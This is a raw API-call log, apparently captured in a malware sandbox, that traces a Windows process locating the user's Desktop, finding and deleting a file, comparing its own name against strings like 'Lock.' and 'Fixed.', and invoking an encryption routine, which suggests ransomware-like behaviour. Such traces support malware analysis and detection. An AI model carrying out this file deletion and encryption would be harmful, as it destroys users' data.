[0189.800] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0189.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0189.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.801] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.801] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mpe9Fe1_ci-oIpS.flv", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv", lpFilePart=0x8cedf4*="mpe9Fe1_ci-oIpS.flv") returned 0x2b [0189.801] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\mpe9fe1_ci-oips.flv")) returned 0x20 [0189.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4adb750, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0xaa9de740, ftLastAccessTime.dwHighDateTime=0x1d5e668, ftLastWriteTime.dwLowDateTime=0xaa9de740, ftLastWriteTime.dwHighDateTime=0x1d5e668, nFileSizeHigh=0x0, nFileSizeLow=0x106d7, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="mpe9Fe1_ci-oIpS.flv", cAlternateFileName="MPE9FE~1.FLV")) returned 0xa87290 [0189.801] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\mpe9fe1_ci-oips.flv")) returned 1 [0189.810] FindNextFileW (in: hFindFile=0xa87290, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4adb750, ftCreationTime.dwHighDateTime=0x1d5f10a, ftLastAccessTime.dwLowDateTime=0xaa9de740, ftLastAccessTime.dwHighDateTime=0x1d5e668, ftLastWriteTime.dwLowDateTime=0xaa9de740, ftLastWriteTime.dwHighDateTime=0x1d5e668, nFileSizeHigh=0x0, nFileSizeLow=0x106d7, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="mpe9Fe1_ci-oIpS.flv", cAlternateFileName="MPE9FE~1.FLV")) returned 0 [0189.810] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.810] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0189.810] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.810] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0189.810] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e563a8 [0189.811] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mpe9Fe1_ci-oIpS.flv", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv", lpFilePart=0x8cf650*="mpe9Fe1_ci-oIpS.flv") returned 0x2b [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0189.811] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mpe9Fe1_ci-oIpS.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\mpe9fe1_ci-oips.flv")) returned 0xffffffff [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0189.811] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0189.811] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.811] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.811] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.811] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O4GkFtfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4GkFtfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GkFtfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFtfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FtfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tfMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fMO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MO8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YRUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RUkhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ukhr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hr.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.812] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0189.812] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0189.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0189.812] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.812] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0189.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2a) returned 0x2e80178 [0189.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0189.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O4GkFtfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4GkFtfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GkFtfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.813] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kFtfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FtfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tfMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fMO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MO8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YRUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RUkhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ukhr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hr.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0189.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0189.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0189.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0189.815] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0189.815] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.815] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.816] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0189.816] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.816] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53788 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0189.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0189.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0189.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0189.818] RtlAllocateHeap (HeapHandle=0x970000, 